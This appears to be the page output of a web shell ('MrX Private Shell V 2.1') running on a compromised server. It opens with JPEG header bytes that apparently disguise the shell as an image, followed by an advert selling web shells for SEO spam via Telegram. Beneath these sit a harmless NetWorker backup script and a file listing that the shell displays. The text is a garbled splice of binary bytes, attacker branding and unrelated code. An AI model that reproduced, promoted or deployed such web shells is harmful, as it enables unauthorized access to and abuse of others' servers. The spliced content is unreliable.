����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# 460_save_nsr_server_name.sh
if [[ ! -z "$NSRSERVER" ]]; then
: # do nothing
elif [[ -f $NSR_ROOT_DIR/res/servers ]]; then
NSRSERVER=$( cat $NSR_ROOT_DIR/res/servers | head -1 )
elif [[ -d $NSR_ROOT_DIR/res/nsrladb/03 ]]; then
NSRSERVER=$(grep servers $NSR_ROOT_DIR/res/nsrladb/*/* | tail -1 | awk '{print $2}' | sed -e 's/[;,]//' )
fi
if [[ -z "$NSRSERVER" ]]; then
Log "The EMC NetWorker server name could not be found automatically."
Error "Please define manually the EMC NetWorker server name under $NSR_ROOT_DIR/res/servers"
fi
echo "$NSRSERVER" > $VAR_DIR/recovery/nsr_server
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 450_prepare_networker_startup.sh | File | 844 B | 0644 |
|
| 460_save_nsr_server_name.sh | File | 605 B | 0644 |
|
| 470_safe_filesystems.sh | File | 354 B | 0644 |
|